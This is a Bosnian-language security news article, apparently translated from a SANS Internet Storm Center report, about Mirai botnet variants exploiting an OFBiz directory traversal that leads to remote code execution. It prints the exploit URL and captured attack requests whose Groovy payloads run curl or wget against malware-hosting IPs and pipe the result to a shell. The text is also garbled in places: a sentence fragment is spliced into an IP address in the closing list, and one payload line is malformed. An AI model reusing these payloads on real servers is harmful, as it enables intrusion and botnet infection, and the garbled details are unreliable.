Softver za planiranje resursa preduzeća (ERP) je u srcu mnogih poduzetničkih projekata koji podržavaju ljudske resurse, računovodstvo, otpremu i proizvodnju. Ovi sistemi mogu postati veoma složeni i teški za održavanje. Često su vrlo prilagođeni, što može otežati krpanje. Međutim, kritične ranjivosti i dalje utiču na ove sisteme i dovode kritične poslovne podatke u opasnost.
SANS Internet Storm centar objavio je izvještaj koji pokazuje kako je open-source ERP okvir OFBiz trenutno meta novih varijanti Mirai botneta.
Kao dio svog opsežnog portfelja projekata, Apache fondacija podržava OFBiz , okvir zasnovan na Javi za kreiranje ERP (Enterprise Resource Planning) aplikacija. Čini se da je OFBiz daleko manje zastupljen od komercijalnih alternativa. Međutim, baš kao i kod bilo kojeg drugog ERP sistema, organizacije se oslanjaju na njega za osjetljive poslovne podatke, a sigurnost ovih ERP sistema je kritična.
U maju ove godine objavljeno je kritično sigurnosno ažuriranje za OFBiz. Ažuriranje je popravilo ranjivost u obilasku direktorija koja bi mogla dovesti do daljinskog izvršavanja komande. Utjecale su na OFBiz verzije prije 18.12.13. Nekoliko sedmica kasnije, detalji o ranjivosti su objavljeni u javnosti.
Ranjivosti obilaženja direktorija ili putanje mogu se koristiti za zaobilaženje pravila kontrole pristupa. Na primjer, ako korisnik može pristupiti direktoriju “/public”, ali ne i direktoriju “/admin”, napadač može koristiti URL kao što je “/public/../admin” da prevari logiku kontrole pristupa. Nedavno su CISA i FBI objavili upozorenje kao dio inicijative “Secure by Design”, fokusirajući se na obilazak direktorija. CISA je istakla da trenutno prate 55 ranjivosti u obilasku direktorija kao dio kataloga “Poznate eksploatirane ranjivosti” (KEV).
Za OFBiz, obilazak direktorija se lako pokreće umetanjem tačke i zareza. Sve što napadač mora pronaći je URL kojem može pristupiti i dodati tačku i zarez nakon koje slijedi ograničeni URL. URL eksploatacije koji trenutno vidimo je:
/webtools/control/forgotPassword;/ProgramExport
Budući da korisnici moraju biti u mogućnosti da resetuju lozinke bez prethodne prijave, “forgotPassword” ne zahtijeva nikakvu autentifikaciju. “ProgramExport” bi, s druge strane, trebao biti kontroliran pristupom i nedostupan osim ako korisnik nije prijavljen. “ProgramExport” je posebno opasan po tome što dozvoljava proizvoljno izvršavanje koda. Pogrešna logika u OFBiz-u je prestala procjenjivati URL na tački i zarezu. Ovo je omogućilo svakom korisniku, bez prijave, pristup drugom dijelu URL-a, “/ProgramExport.”
Napadač mora koristiti POST zahtjev da iskoristi ranjivost, ali ne mora nužno imati tijelo zahtjeva. Umjesto toga, URL parametar će raditi sasvim dobro.
SANS Internet Storm Center koristi opsežnu mrežu honeypota da otkrije pokušaje da se iskoriste široki raspon propusta web aplikacija. Značajni novi pokušaji eksploatacije sažeti su u izvještaju ” Prvo viđeno “. Ovog vikenda, ovi senzori su otkrili značajan porast pokušaja eksploatacije CVE-2024-32213, OFBiz spomenute ranjivosti u prelasku preko direktorija, što je odmah otkriveno u izvještaju “Prvo viđeno”.
Pokušaji eksploatacije potekli su od dvije različite IP adrese koje su takođe bile povezane s različitim pokušajima eksploatacije IoT uređaja, koji se obično povezuju sa trenutnim varijantama “Mirai” botneta.
Zločinci su koristili dvije vrste eksploatacije. Prvi je koristio URL da uključi naredbu koju je exploit trebao izvršiti:
POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh
Drugi je koristio tijelo zahtjeva za naredbu, što je uobičajenije za “POST” zahtjeve:
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: [victim IP address]
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);
Nažalost, ni “bin.sh” ni “sh” skripta nije vraćena. IP adrese su uključene u skeniranje 29. jula, koristeći korisnički agent “KrebsOnSecurity”, savjet za infosec blogera Briana Krebsa. Međutim, skenirani URL-ovi su uglavnom bili parazitski, tražeći postojeće web ljuske koje su zaostale nakon prethodnih napada. IP adresa je takođe korištena za distribuciju datoteke pod nazivom “botx.arm”. Ovo ime datoteke se često povezuje sa Mirai varijantama.
Sa najavom ranjivosti u maju, čekali smo neka skeniranja kako bismo iskoristili ranjivost OFBiz-a. Eksploatacija je bila trivijalna, a iako je ranjivo i izloženo stanovništvo malo, to u prošlosti nije zaustavilo napadače. Ali sada barem eksperimentiraju i možda dodaju ranjivost botovima poput Mirai varijanti.
Uključeno je samo nekoliko IP adresa:
- 95.214.27.196 : Slanje eksploatacije kao URL parametra i hosting zlonamjernog softvera.
- 83.222.191 Mirai botnet cilja na OFBiz servere koji su ranjivi na prolazak kroz direktorij.62 : Slanje eksploatacije kao tijela zahtjeva. Zlonamjerni softver hostiran na 185.196.10.231. Ranije u julu, ova IP adresa je skenirala u potrazi za ranjivostima interneta stvari.
- 185.196.10.231 : hosting zlonamjernog softvera
Izvor:The Hacker News
